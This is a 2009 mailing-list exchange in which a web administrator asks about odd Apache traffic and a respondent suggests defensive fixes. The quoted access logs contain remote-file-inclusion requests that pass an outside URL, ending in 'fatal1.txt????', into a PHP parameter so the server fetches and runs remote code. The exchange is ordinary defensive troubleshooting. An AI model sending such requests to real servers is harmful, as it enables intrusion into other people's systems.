[ale] Apache PHP redirect proxy type hack

Brian Whigham oobx at itmonger.com
Mon Jun 29 17:37:22 EDT 2009


members.php isn't.  But, it would appear that webpage.php is (as it returned
200).  Who owns webpage.php?  How did the page get there?  Have you tried
the exact same request?  It should probably be removed or debugged.

- You could block by IP or range
- remove webpage.php
- disallow php includes (I forget the php.ini directive)

On Mon, Jun 29, 2009 at 4:40 PM, Ben Alexander <ben-ale at bensbox.com> wrote:

> Every now and then some IP address from Asia or other place hits our web
> server and is utilizing some PHP or mod_rewrite perhaps bug to proxy
> themselves to another website perhaps and use a lot of bandwidth, but only
> our outgoing it seems.
>
> Here is an example from access_log of this (members.php is not a valid PHP
> page on the site):
>
> 80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET
> //members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt????
> HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"
> 80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET
> /webpage.php//members.php?act=view&p=passwd&dir=
> http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 210484729 "-"
> "Mozilla/5.0" "-"
>
> When this happens, there are hundreds of megs of log lines like this in
> error_log:
>
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning:
>  virtual() [<a href='function.virtual'>function.virtual</a>]: Unable to
> include 'footer.php' - error finding URI in /htdocs/
> website.com/webpage.php on line 93
>
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request exceeded
> the limit of 10 subrequest nesting levels due to probable confguration
> error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use
> 'LogLevel debug' to get a backtrace.
>
>
> Any idea how to prevent this?
>
> Thanks,
> Ben
>
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://mail.ale.org/mailman/listinfo/ale
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.ale.org/pipermail/ale/attachments/20090629/4547dc1a/attachment.html 


More information about the Ale mailing list